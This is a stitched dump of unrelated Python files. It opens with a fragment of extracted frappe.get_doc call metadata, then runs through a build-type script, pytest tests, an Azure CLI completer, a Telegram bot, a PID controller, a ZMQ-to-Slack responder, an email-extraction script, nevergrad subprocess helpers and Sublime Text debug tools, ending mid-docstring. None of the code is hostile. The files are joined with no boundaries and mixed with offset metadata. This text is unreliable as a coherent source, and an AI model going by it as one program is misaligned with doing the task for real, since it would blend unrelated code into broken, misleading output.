11512), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check4', {'applicant_id': app.ref_id})\n", (11469, 11512), False, 'import frappe\n'), ((11914, 11971), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check5', {'applicant_id': app.ref_id})\n", (11928, 11971), False, 'import frappe\n'), ((12373, 12430), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check6', {'applicant_id': app.ref_id})\n", (12387, 12430), False, 'import frappe\n'), ((1097, 1169), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check1', {'applicant_id': app.ref_id})\n", (1111, 1169), False, 'import frappe\n'), ((1580, 1652), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check2', {'applicant_id': app.ref_id})\n", 
(1594, 1652), False, 'import frappe\n'), ((2063, 2135), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check3', {'applicant_id': app.ref_id})\n", (2077, 2135), False, 'import frappe\n'), ((2546, 2618), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check4', {'applicant_id': app.ref_id})\n", (2560, 2618), False, 'import frappe\n'), ((2911, 2975), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2925, 2975), False, 'import frappe\n'), ((3651, 3722), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check2', {'applicant_id': app.ref_id})\n", (3665, 3722), False, 'import frappe\n'), ((4131, 4202), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check3', {'applicant_id': app.ref_id})\n", (4145, 4202), False, 'import frappe\n'), ((4611, 4682), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check4', {'applicant_id': app.ref_id})\n", (4625, 4682), False, 'import frappe\n'), ((5087, 5156), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check1', {'applicant_id': app.ref_id})\n", (5101, 5156), False, 'import frappe\n'), ((5561, 5630), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check2', {'applicant_id': app.ref_id})\n", (5575, 5630), False, 'import frappe\n'), ((6035, 6104), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check3', {'applicant_id': app.ref_id})\n", (6049, 6104), False, 'import frappe\n'), ((6509, 6578), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check4', {'applicant_id': app.ref_id})\n", (6523, 6578), False, 'import frappe\n'), ((6981, 7049), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Family Check1', {'applicant_id': app.ref_id})\n", (6995, 7049), False, 'import frappe\n'), ((7458, 7529), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check1', {'applicant_id': app.ref_id})\n", (7472, 7529), False, 'import frappe\n'), ((7938, 8009), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check2', {'applicant_id': app.ref_id})\n", (7952, 8009), False, 'import frappe\n'), ((8418, 8489), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check3', {'applicant_id': app.ref_id})\n", (8432, 8489), False, 'import frappe\n'), ((8898, 8969), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check4', {'applicant_id': app.ref_id})\n", (8912, 8969), False, 'import frappe\n'), ((9368, 9434), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Civil Check"""', "{'applicant_id': app.ref_id}"], {}), 
"('Verify Civil Check', {'applicant_id': app.ref_id})\n", (9382, 9434), False, 'import frappe\n'), ((9839, 9908), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Criminal Check', {'applicant_id': app.ref_id})\n", (9853, 9908), False, 'import frappe\n'), ((10303, 10367), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check1', {'applicant_id': app.ref_id})\n", (10317, 10367), False, 'import frappe\n'), ((10762, 10826), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check2', {'applicant_id': app.ref_id})\n", (10776, 10826), False, 'import frappe\n'), ((11221, 11285), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check3', {'applicant_id': app.ref_id})\n", (11235, 11285), False, 'import frappe\n'), ((11680, 11744), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check4', {'applicant_id': app.ref_id})\n", (11694, 11744), False, 'import frappe\n'), ((12139, 12203), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check5', {'applicant_id': app.ref_id})\n", (12153, 12203), False, 'import frappe\n'), ((12598, 12662), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check6', {'applicant_id': app.ref_id})\n", (12612, 12662), False, 'import frappe\n'), ((3163, 3234), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check1', {'applicant_id': app.ref_id})\n", (3177, 3234), False, 'import frappe\n')] |
"""Set the build version to be 'qa', 'rc', 'release'"""
import sys
import os
import re
import logging
log = logging.getLogger()
log.addHandler(logging.StreamHandler())
log.setLevel(logging.DEBUG)
def get_build_type(travis_tag=None):
if not travis_tag:
return "qa"
log.debug("getting build type for tag: \"%s\"", travis_tag)
if re.match(r'v\d+\.\d+\.\d+rc\d+$', travis_tag):
return 'rc'
elif re.match(r'v\d+\.\d+\.\d+$', travis_tag):
return 'release'
return 'qa'
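# Illustrative tag-to-build-type mapping (added for clarity; not part of the original
# script), following the regexes above:
# >>> get_build_type("v0.38.0rc3")
# 'rc'
# >>> get_build_type("v0.38.0")
# 'release'
# >>> get_build_type("some-other-tag")
# 'qa'
# >>> get_build_type(None)
# 'qa'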
def main():
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
build_type_path = os.path.join(root_dir, 'lbry', 'build_type.py')
log.debug("configuring build type file: %s", build_type_path)
travis_commit = os.environ['TRAVIS_COMMIT'][:6]
build_type = get_build_type(os.environ.get('TRAVIS_TAG', None))
log.debug("setting build type=%s, build commit=%s", build_type, travis_commit)
with open(build_type_path, 'w') as f:
f.write(f"BUILD = \"{build_type}\"\nBUILD_COMMIT = \"{travis_commit}\"\n")
if __name__ == '__main__':
sys.exit(main())
| [
"logging.getLogger",
"logging.StreamHandler",
"re.match",
"os.environ.get",
"os.path.join",
"os.path.realpath"
] | [((110, 129), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (127, 129), False, 'import logging\n'), ((145, 168), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (166, 168), False, 'import logging\n'), ((351, 401), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+rc\\\\d+$', travis_tag)\n", (359, 401), False, 'import re\n'), ((622, 669), 'os.path.join', 'os.path.join', (['root_dir', '"""lbry"""', '"""build_type.py"""'], {}), "(root_dir, 'lbry', 'build_type.py')\n", (634, 669), False, 'import os\n'), ((427, 471), 're.match', 're.match', (['"""v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$"""', 'travis_tag'], {}), "('v\\\\d+\\\\.\\\\d+\\\\.\\\\d+$', travis_tag)\n", (435, 471), False, 'import re\n'), ((820, 854), 'os.environ.get', 'os.environ.get', (['"""TRAVIS_TAG"""', 'None'], {}), "('TRAVIS_TAG', None)\n", (834, 854), False, 'import os\n'), ((571, 597), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (587, 597), False, 'import os\n')] |
"""Collection of tests."""
import pytest
import dblib.lib
f0 = dblib.lib.Finding('CD spook', 'my_PC', 'The CD drive is missing.')
f1 = dblib.lib.Finding('Unplugged', 'my_PC', 'The power cord is unplugged.')
f2 = dblib.lib.Finding('Monitor switched off', 'my_PC', 'The monitor is switched off.')
def test_add_remove():
"""Test function."""
db = dblib.lib.BackyardDB()
# regular cases
db.add(f0)
assert f0 in db.findings
assert len(db.findings) == 1
db.add(f1)
assert f1 in db.findings
assert len(db.findings) == 2
db.add(f2)
assert f2 in db.findings
assert len(db.findings) == 3
db.add(None)
assert len(db.findings) == 3
db.remove(f1)
assert f1 not in db.findings
assert len(db.findings) == 2
# test exceptions
with pytest.raises(TypeError):
db.add(1)
def test_update():
"""Test function."""
db = dblib.lib.BackyardDB()
db.add(f0)
db.add(f1)
db.update(f1, f2)
assert f2 in db.findings
assert len(db.findings) == 2
| [
"pytest.raises"
] | [((797, 821), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (810, 821), False, 'import pytest\n')] |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.decorators import Completer
from azure.cli.core.commands.client_factory import get_subscription_id
from ._client_factory import cf_policy_insights
@Completer
def get_policy_remediation_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx)
sub = get_subscription_id(cmd.cli_ctx)
rg = getattr(namespace, 'resource_group_name', None)
management_group = getattr(namespace, 'management_group_name', None)
if rg:
result = client.remediations.list_for_resource_group(subscription_id=sub, resource_group_name=rg)
elif management_group:
result = client.remediations.list_for_management_group(management_group_id=management_group)
else:
result = client.remediations.list_for_subscription(subscription_id=sub)
return [i.name for i in result]
@Completer
def get_policy_metadata_completion_list(cmd, prefix, namespace, **kwargs): # pylint: disable=unused-argument
client = cf_policy_insights(cmd.cli_ctx).policy_metadata
from azure.mgmt.policyinsights.models import QueryOptions
query_options = QueryOptions(top=2000)
return [metadata.name for metadata in client.list(query_options) if metadata.name.startswith(prefix)]
| [
"azure.cli.core.commands.client_factory.get_subscription_id",
"azure.mgmt.policyinsights.models.QueryOptions"
] | [((695, 727), 'azure.cli.core.commands.client_factory.get_subscription_id', 'get_subscription_id', (['cmd.cli_ctx'], {}), '(cmd.cli_ctx)\n', (714, 727), False, 'from azure.cli.core.commands.client_factory import get_subscription_id\n'), ((1497, 1519), 'azure.mgmt.policyinsights.models.QueryOptions', 'QueryOptions', ([], {'top': '(2000)'}), '(top=2000)\n', (1509, 1519), False, 'from azure.mgmt.policyinsights.models import QueryOptions\n')] |
from aiogram import Bot, types
from aiogram.dispatcher import Dispatcher
from aiogram.utils import executor
TOKEN = "Token for your bot"
bot = Bot(token=TOKEN)
dp = Dispatcher(bot)
@dp.message_handler(commands=['start', 'help'])
async def send_welcome(msg: types.Message):
    # "Добро пожаловать" means "Welcome"; Message.reply() answers the /start or /help command.
    await msg.reply(f'Добро пожаловать, {msg.from_user.first_name}')
@dp.message_handler(content_types=['text'])
async def get_text_messages(msg: types.Message):
    if msg.text.lower() == 'привет':  # 'привет' means 'hello'
        await msg.answer('Привет!')  # 'Hello!'
    else:
        await msg.answer('Я не понимаю')  # 'I do not understand'
if __name__ == '__main__':
executor.start_polling(dp) | [
"aiogram.Bot",
"aiogram.dispatcher.Dispatcher",
"aiogram.utils.executor.start_polling"
] | [((146, 162), 'aiogram.Bot', 'Bot', ([], {'token': 'TOKEN'}), '(token=TOKEN)\n', (149, 162), False, 'from aiogram import Bot, types\n'), ((169, 184), 'aiogram.dispatcher.Dispatcher', 'Dispatcher', (['bot'], {}), '(bot)\n', (179, 184), False, 'from aiogram.dispatcher import Dispatcher\n'), ((620, 646), 'aiogram.utils.executor.start_polling', 'executor.start_polling', (['dp'], {}), '(dp)\n', (642, 646), False, 'from aiogram.utils import executor\n')] |
# timedpid.py
# Source: https://github.com/DrGFreeman/PyTools
#
# MIT License
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# This module defines a simple Proportional - Integral - Derivative (PID)
# controller with different time step calculation methods. This is a python
# implementation of my Arduino TimedPID library which can be found at
# https://github.com/DrGFreeman/TimedPID. Refer to this repository for detailed
# documentation.
import time
class TimedPID:
# Constructor
def __init__(self, kp = 1., ki = 0., kd = 0.):
self._kp = kp
self._ki = ki
self._kd = kd
self._cmdMin = None
self._cmdMax = None
self._boundRange = False
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
def getCmd(self, setPoint, procVar):
"""Gets the PID command without time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled.
No time step is used (assumed = 1)."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += error
errorDerivative = error - self._errorPrevious
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def getCmdAutoStep(self, setPoint, procVar):
"""Gets the PID command with automatic time step calculation.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
The time step is calculated as the time since the last call to the
method."""
# Calculate time step
currentTime = time.time()
timeStep = currentTime - self._lastCmdTime
# Set last time method was called to current time
self._lastCmdTime = currentTime
# Get command
return self.getCmdStep(setPoint, procVar, timeStep)
def getCmdStep(self, setPoint, procVar, timeStep):
"""Gets the PID command with a specified time step.
setPoint is the desired process set point,
procVar is the current value of the process variable to be controlled,
timeStep is the time step."""
# Calculate error terms
error = setPoint - procVar
self._errorIntegral += (error + self._errorPrevious) / 2 * timeStep
errorDerivative = (error - self._errorPrevious) / timeStep
# Set last error to current error
self._errorPrevious = error
# Calculate command
cmd = self._kp * error + self._ki * self._errorIntegral + \
self._kd * errorDerivative
# Return bound command
return self._boundCmd(cmd)
def setCmdRange(self, cmdMin, cmdMax):
"""Sets the maximum command range. Commands calculated outside the
cmdMin and cmdMax will be set to cmdMin or cmdMax respectively."""
self._cmdMin = cmdMin
self._cmdMax = cmdMax
self._boundRange = True
def setGains(self, kp = 1., ki = 0., kd = 0.):
"""Sets the proportional, integral and derivative terms."""
self._kp = kp
self._ki = ki
self._kd = kd
def reset(self):
"""Resets the PID error terms and timer."""
self._errorIntegral = 0.
self._errorPrevious = 0.
self._lastCmdTime = time.time()
# Private methods
def _boundCmd(self, cmd):
"""Bounds the command within the range _cmdMin to _cmdMax."""
if self._boundRange:
if cmd < self._cmdMin:
cmd = self._cmdMin
elif cmd > self._cmdMax:
cmd = self._cmdMax
return cmd
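# --- Usage sketch (not part of the original module) ---------------------------
# Illustrative only: drive a crude first-order "plant" toward a set point of
# 1.0. The gains and the 0.1 s time step are arbitrary example values.
if __name__ == '__main__':
    pid = TimedPID(kp = 2.0, ki = 0.5, kd = 0.1)
    pid.setCmdRange(-10.0, 10.0)
    procVar = 0.0
    for _ in range(50):
        cmd = pid.getCmdStep(1.0, procVar, 0.1)
        procVar += cmd * 0.1  # toy plant: the value simply integrates the command
    print('Final process variable: {:.3f}'.format(procVar))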
| [
"time.time"
] | [((1842, 1853), 'time.time', 'time.time', ([], {}), '()\n', (1851, 1853), False, 'import time\n'), ((2962, 2973), 'time.time', 'time.time', ([], {}), '()\n', (2971, 2973), False, 'import time\n'), ((4624, 4635), 'time.time', 'time.time', ([], {}), '()\n', (4633, 4635), False, 'import time\n')] |
#
# -*- coding: utf-8-*-
# receives messages via zmq and executes some simple
# operations.
#
# (c) ISC Clemenz & Weinbrecht GmbH 2018
#
import json
import requests
import zmq
import pmon
class ZmqResponder(object):
context = None
socket = None
def __init__(self):
"""
Constructor.
"""
self.cfg = pmon.CFG
self.log = pmon.LOG
def __enter__(self):
self.bind()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.done()
def bind(self):
self.log.info("Binding ZMQ")
port = self.cfg['pmon']['zmq.port']
bind_str = "tcp://*:{0}".format(port)
self.context = zmq.Context(1)
self.socket = self.context.socket(zmq.REP)
self.socket.bind(bind_str)
def done(self):
self.log.info("Disconnecting ZMQ")
if self.socket is not None:
self.socket.close()
if self.context is not None:
self.context.term()
def _read_message(self):
self.log.debug("Wait for incoming message")
msg = self.socket.recv()
_msg = msg.decode('utf-8')
return json.loads(_msg)
@staticmethod
def _make_slack_payload(message):
slack_payload = dict()
slack_payload['text'] = message['msg']
attachments = list()
slack_payload['attachments'] = attachments
attachment = dict()
attachment["fallback"] = message['msg']
attachment['text'] = message['msg']
attachment['title'] = message['msg.type']
attachment['author_name'] = message['from']
attachments.append(attachment)
return slack_payload
def _report_message_to_slack(self, message):
"""
Send a message to Slack Web-Hook.
:param message: the message record to be send to slack
:return: None
"""
self.log.debug("Forwarding message to slack")
url = self.cfg['pmon']['slack.hook']
payload = json.dumps(self._make_slack_payload(message))
headers = {'Accept': 'application/json',
'Content-Type': 'application/json',
'Content-Encoding': 'utf8',
'Content-Length': str(len(payload))}
try:
rsp = requests.post(url, data=payload, headers=headers)
if rsp.status_code != requests.codes.ok:
self.log.warn("problem sending to slack: {0}".format(rsp.status_code))
except Exception as x:
self.log.error(str(x))
def respond(self):
go_on = True
while go_on:
message = self._read_message()
self.log.debug("Message: {0}, {1}".format(message['msg.type'],
message['msg']))
self.socket.send_string('ACK')
try:
self._report_message_to_slack(message)
except Exception as x:
self.log.error(str(x))
            go_on = message['msg'] != 'stop'
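# --- Usage sketch (not part of the original module) ---------------------------
# Illustrative only: the responder is a context manager, so bind() and done()
# are handled by __enter__/__exit__. Assumes pmon.CFG provides the 'pmon'
# settings ('zmq.port', 'slack.hook') used above.
if __name__ == '__main__':
    with ZmqResponder() as responder:
        responder.respond()  # loops until a message with msg == 'stop' arrives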
| [
"json.loads",
"requests.post",
"zmq.Context"
] | [((693, 707), 'zmq.Context', 'zmq.Context', (['(1)'], {}), '(1)\n', (704, 707), False, 'import zmq\n'), ((1160, 1176), 'json.loads', 'json.loads', (['_msg'], {}), '(_msg)\n', (1170, 1176), False, 'import json\n'), ((2287, 2336), 'requests.post', 'requests.post', (['url'], {'data': 'payload', 'headers': 'headers'}), '(url, data=payload, headers=headers)\n', (2300, 2336), False, 'import requests\n')] |
# coding: utf-8
#just prints the emails of members of a group to stdout,
#both primary and secondary members
# run as
# $python extractemails_nogui.py "Tidal Disruption Events"
from __future__ import print_function
__author__ = '<NAME>, NYU - GitHub: fedhere'
import sys
import pandas as pd
from argparse import ArgumentParser
from config import tvsfile
def parse_args(subglist):
""" Use ArgParser to build up the arguments we will use in our script
"""
stored_args = {}
    # build the argument parser and describe the available subgroups
parser = ArgumentParser(description='Selecting members by subgroup')
parser.add_argument('subgroup',
action='store',
default=None,
help='Choose the subgroup affiliation:' +
' -- '.join([s for s in subglist]))
args = parser.parse_args()
return args
if __name__ == '__main__':
if tvsfile is None:
print ("Required Argument: Google Doc file identifier (if you do not have it email federica!)")
sys.exit()
TVSMembers = pd.read_csv('https://docs.google.com/spreadsheets/d/' +
tvsfile +
'/export?gid=0&format=csv',
index_col=0)
subgroups = TVSMembers.primary.unique()
conf = parse_args([x for x in subgroups if str(x) != 'nan'])
primary = conf.subgroup
secondary = conf.subgroup
emails = TVSMembers[TVSMembers.primary == primary]['email'].values
print ("These are the members with primary affiliation with " + primary)
print ("")
print (' '.join([em + ','for em in emails]))
emails = TVSMembers[(TVSMembers.secondary == secondary) | (TVSMembers['secondary.1'] == secondary) | (TVSMembers['secondary.2'] == secondary)]['email'].values
print ("\n")
print ("These are the members with secondary affiliation with " + secondary)
print ("")
print (' '.join([em + ','for em in emails]))
print ("")
print ("If you also want their names and affiliations use: ")
print ("$python extractemailsW.py " + conf.subgroup)
| [
"sys.exit",
"argparse.ArgumentParser",
"pandas.read_csv"
] | [((595, 654), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'description': '"""Selecting members by subgroup"""'}), "(description='Selecting members by subgroup')\n", (609, 654), False, 'from argparse import ArgumentParser\n'), ((1138, 1248), 'pandas.read_csv', 'pd.read_csv', (["('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv')"], {'index_col': '(0)'}), "('https://docs.google.com/spreadsheets/d/' + tvsfile +\n '/export?gid=0&format=csv', index_col=0)\n", (1149, 1248), True, 'import pandas as pd\n'), ((1109, 1119), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1117, 1119), False, 'import sys\n')] |
import pytest
from duckql.properties import Null
@pytest.fixture(scope="module")
def valid_instance() -> Null:
return Null()
def test_string(valid_instance: Null):
assert str(valid_instance) == 'NULL'
def test_obj(valid_instance: Null):
assert valid_instance.obj == 'properties.Null'
def test_json_parse(valid_instance: Null):
assert valid_instance.json() == '{"obj": "properties.Null"}'
| [
"pytest.fixture",
"duckql.properties.Null"
] | [((53, 83), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (67, 83), False, 'import pytest\n'), ((125, 131), 'duckql.properties.Null', 'Null', ([], {}), '()\n', (129, 131), False, 'from duckql.properties import Null\n')] |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import shutil
import tempfile
import subprocess
import typing as tp
from pathlib import Path
from nevergrad.common import tools as ngtools
class Descriptors:
"""Provides access to a set of descriptors for the parametrization
This can be used within optimizers.
""" # TODO add repr
# pylint: disable=too-many-arguments
def __init__(
self,
deterministic: bool = True,
deterministic_function: bool = True,
monoobjective: bool = True,
not_manyobjective: bool = True,
continuous: bool = True,
metrizable: bool = True,
ordered: bool = True,
) -> None:
self.deterministic = deterministic
self.deterministic_function = deterministic_function
self.continuous = continuous
self.metrizable = metrizable
self.ordered = ordered
self.monoobjective = monoobjective
self.not_manyobjective = not_manyobjective
def __and__(self, other: "Descriptors") -> "Descriptors":
values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__}
return Descriptors(**values)
def __repr__(self) -> str:
diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items()))
return f"{self.__class__.__name__}({diff})"
class NotSupportedError(RuntimeError):
"""This type of operation is not supported by the parameter.
"""
class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore
"""Creates a full copy of a directory inside a temporary directory
This class can be used as TemporaryDirectory but:
- the created copy path is available through the copyname attribute
- the contextmanager returns the clean copy path
- the directory where the temporary directory will be created
can be controlled through the CLEAN_COPY_DIRECTORY environment
variable
"""
key = "CLEAN_COPY_DIRECTORY"
@classmethod
def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None:
"""Sets the CLEAN_COPY_DIRECTORY environment variable in
order for subsequent calls to use this directory as base for the
copies.
"""
assert Path(directory).exists(), "Directory does not exist"
os.environ[cls.key] = str(directory)
# pylint: disable=redefined-builtin
def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None:
if dir is None:
dir = os.environ.get(self.key, None)
super().__init__(prefix="tmp_clean_copy_", dir=dir)
self.copyname = Path(self.name) / Path(source).name
shutil.copytree(str(source), str(self.copyname))
def __enter__(self) -> Path:
super().__enter__()
return self.copyname
class FailedJobError(RuntimeError):
"""Job failed during processing
"""
class CommandFunction:
"""Wraps a command as a function in order to make sure it goes through the
pipeline and notify when it is finished.
The output is a string containing everything that has been sent to stdout
Parameters
----------
command: list
command to run, as a list
verbose: bool
prints the command and stdout at runtime
cwd: Path/str
path to the location where the command must run from
Returns
-------
str
Everything that has been sent to stdout
"""
def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None,
env: tp.Optional[tp.Dict[str, str]] = None) -> None:
if not isinstance(command, list):
raise TypeError("The command must be provided as a list")
self.command = command
self.verbose = verbose
self.cwd = None if cwd is None else str(cwd)
self.env = env
    def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str:
        """Call the command line with additional arguments
        The keyword arguments will be sent as --{key}={val}
        The logs are buffered. They will be printed if the job fails, or sent as output of the function
Errors are provided with the internal stderr
"""
# TODO make the following command more robust (probably fails in multiple cases)
full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()]
if self.verbose:
print(f"The following command is sent: {full_command}")
outlines: tp.List[str] = []
with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=False, cwd=self.cwd, env=self.env) as process:
try:
assert process.stdout is not None
for line in iter(process.stdout.readline, b''):
if not line:
break
outlines.append(line.decode().strip())
if self.verbose:
print(outlines[-1], flush=True)
except Exception: # pylint: disable=broad-except
process.kill()
process.wait()
raise FailedJobError("Job got killed for an unknown reason.")
stderr = process.communicate()[1] # we already got stdout
stdout = "\n".join(outlines)
retcode = process.poll()
if stderr and (retcode or self.verbose):
print(stderr.decode(), file=sys.stderr)
if retcode:
subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr)
raise FailedJobError(stderr.decode()) from subprocess_error
return stdout
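# --- Usage sketch (not part of the original module) ---------------------------
# Illustrative only: wrap a trivial shell command. Assumes an "echo"
# executable is available on the PATH.
if __name__ == '__main__':
    echo = CommandFunction(['echo', 'hello'], verbose=True)
    output = echo('world')  # runs: echo hello world
    assert output.strip() == 'hello world'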
| [
"pathlib.Path",
"subprocess.Popen",
"subprocess.CalledProcessError",
"os.environ.get",
"nevergrad.common.tools.different_from_defaults"
] | [((2787, 2817), 'os.environ.get', 'os.environ.get', (['self.key', 'None'], {}), '(self.key, None)\n', (2801, 2817), False, 'import os\n'), ((2902, 2917), 'pathlib.Path', 'Path', (['self.name'], {}), '(self.name)\n', (2906, 2917), False, 'from pathlib import Path\n'), ((4849, 4973), 'subprocess.Popen', 'subprocess.Popen', (['full_command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)', 'cwd': 'self.cwd', 'env': 'self.env'}), '(full_command, stdout=subprocess.PIPE, stderr=subprocess.\n PIPE, shell=False, cwd=self.cwd, env=self.env)\n', (4865, 4973), False, 'import subprocess\n'), ((2499, 2514), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (2503, 2514), False, 'from pathlib import Path\n'), ((2920, 2932), 'pathlib.Path', 'Path', (['source'], {}), '(source)\n', (2924, 2932), False, 'from pathlib import Path\n'), ((5876, 5963), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', (['retcode', 'process.args'], {'output': 'stdout', 'stderr': 'stderr'}), '(retcode, process.args, output=stdout, stderr=\n stderr)\n', (5905, 5963), False, 'import subprocess\n'), ((1445, 1514), 'nevergrad.common.tools.different_from_defaults', 'ngtools.different_from_defaults', ([], {'instance': 'self', 'check_mismatches': '(True)'}), '(instance=self, check_mismatches=True)\n', (1476, 1514), True, 'from nevergrad.common import tools as ngtools\n')] |
# coding=utf-8
"""
Internal tools for NimLime development & testing.
"""
from pprint import pprint
import sublime
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from functools import wraps
from pstats import Stats
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
debug_on = False
if debug_on:
sublime.message_dialog("NimLime running in debug mode.")
# Debug printer
def print_debug(*args, **kwargs):
"""
Print when debugging.
:type args: Any
:type kwargs: Any
"""
if debug_on:
pprint(*args, **kwargs)
# Profiling functions
profiler = Profile()
profiler_running = False
def profile_func(func):
"""
Decorator which profiles a single function.
Call print_profile_data to print the collected data.
:type func: Callable
